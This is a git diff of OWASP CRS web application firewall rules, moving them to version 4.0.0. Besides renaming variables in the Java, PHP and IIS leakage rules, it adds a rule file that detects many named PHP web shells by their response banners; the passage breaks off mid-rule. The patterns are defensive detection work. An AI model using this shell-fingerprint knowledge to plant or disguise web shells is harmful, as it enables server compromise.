# -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -29,7 +30,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ capture,\ t:none,\ msg:'Java Source Code Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-java',\ tag:'platform-multi',\ @@ -38,11 +39,9 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # -=[ Java Errors ]=- @@ -56,7 +55,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ capture,\ t:none,\ msg:'Java Errors',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-java',\ tag:'platform-multi',\ @@ -65,34 +64,32 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf index 94933a279b..d0955d222a 100644 --- a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf +++ b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -29,7 +30,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ capture,\ t:none,\ msg:'PHP Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -38,11 +39,9 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # -=[ PHP source code leakage ]=- @@ -56,7 +55,7 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan capture,\ t:none,\ msg:'PHP source code leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -65,29 +64,24 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -# Detect the presence of the PHP open tag ".{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)
Timeout expired
)|

internal server error<\/h1>.*?

part of the server has crashed or it has a configuration error\.<\/h2>|cannot connect to the server: timed out)" \ +SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)
Timeout expired
)|

internal server error

.*?

part of the server has crashed or it has a configuration error\.

|cannot connect to the server: timed out)" \ "id:954110,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Application Availability Error',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-iis',\ @@ -59,23 +58,21 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:<\/font tag:'PCI/6.5.6',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # IIS Errors leakage # -SecRule RESPONSE_BODY "@rx (?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application uses a value of the wrong type for the current operation\b|error')| trappable error occurred in an external object\. The script cannot continue running\b)|Microsoft VBScript (?:compilation (?:\(0x8|error)|runtime (?:Error|\(0x8))\b|Object required: '|error '800)|Version Information:<\/b>(?: |\s)(?:Microsoft \.NET Framework|ASP\.NET) Version:|>error 'ASP\b|An Error Has Occurred|>Syntax error in string in query expression|\/[Ee]rror[Mm]essage\.aspx?\?[Ee]rror\b)" \ +SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ "id:954120,\ phase:4,\ block,\ capture,\ t:none,\ msg:'IIS Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-iis',\ @@ -85,11 +82,9 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_STATUS "!@rx ^404$" \ @@ -99,7 +94,7 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ capture,\ t:none,\ msg:'IIS Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-iis',\ @@ -109,38 +104,36 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ chain" SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \ "capture,\ t:none,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-955-WEB-SHELLS.conf b/rules/RESPONSE-955-WEB-SHELLS.conf new file mode 100644 index 0000000000..d8a2e4b700 --- /dev/null +++ b/rules/RESPONSE-955-WEB-SHELLS.conf @@ -0,0 +1,548 @@ +# ------------------------------------------------------------------------ +# OWASP CRS ver.4.0.0 +# Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. +# +# The OWASP CRS is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,skipAfter:END-RESPONSE-955-WEB-SHELLS" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# For performance reasons, most of the shells are matched using this rule. +# This rule is intended for PHP web shells. +SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ + "id:955100,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Web shell detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# r57 web shell +SecRule RESPONSE_BODY "@rx (r57 Shell Version [0-9.]+|r57 shell)" \ + "id:955110,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'r57 web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# WSO web shell +SecRule RESPONSE_BODY "@rx ^.*? - WSO [0-9.]+" \ + "id:955120,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'WSO web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# b4tm4n web shell (https://github.com/k4mpr3t/b4tm4n) +SecRule RESPONSE_BODY "@rx B4TM4N SH3LL.*" \ + "id:955130,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'b4tm4n web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Mini Shell web shell +SecRule RESPONSE_BODY "@rx Mini Shell.*Developed By LameHacker" \ + "id:955140,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Mini Shell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Ashiyane web shell +SecRule RESPONSE_BODY "@rx \.:: .* ~ Ashiyane V [0-9.]+ ::\." \ + "id:955150,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Ashiyane web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Symlink_Sa web shell +SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ + "id:955160,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Symlink_Sa web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# CasuS web shell +SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ + "id:955170,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'CasuS web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# GRP WebShell +SecRule RESPONSE_BODY "@rx ^\r\n\r\nGRP WebShell [0-9.]+ " \ + "id:955180,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'GRP WebShell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# NGHshell web shell +SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ + "id:955190,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'NGHshell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# SimAttacker web shell +SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " \ + "id:955200,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'SimAttacker web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Unknown web shell +SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum .*<title>Web Shell" \ + "id:955210,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Unknown web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# lama's'hell web shell +SecRule RESPONSE_BODY "@rx lama's'hell v. [0-9.]+" \ + "id:955220,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'lama\'s\'hell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# lostDC web shell +SecRule RESPONSE_BODY "@rx ^ *\n[ ]+\n[ ]+lostDC - " \ + "id:955230,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'lostDC web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Unknown web shell +SecRule RESPONSE_BODY "@rx ^<title>PHP Web Shell\r\n\r\n\r\n " \ + "id:955240,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Unknown web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Unknown web shell +SecRule RESPONSE_BODY "@rx ^\n\n
Input command :
\n
" \ + "id:955250,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Unknown web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Ru24PostWebShell web shell +SecRule RESPONSE_BODY "@rx ^\n\nRu24PostWebShell - " \ + "id:955260,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Ru24PostWebShell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# s72 Shell web shell +SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King" \ + "id:955270,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'s72 Shell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# PhpSpy web shell +SecRule RESPONSE_BODY "@rx ^\r\n\r\n\r\nPhpSpy Ver [0-9]+" \ + "id:955280,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'PhpSpy web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# g00nshell web shell +SecRule RESPONSE_BODY "@rx ^ \n\n\n\ng00nshell v[0-9.]+ " \ + "id:955290,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'g00nshell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + 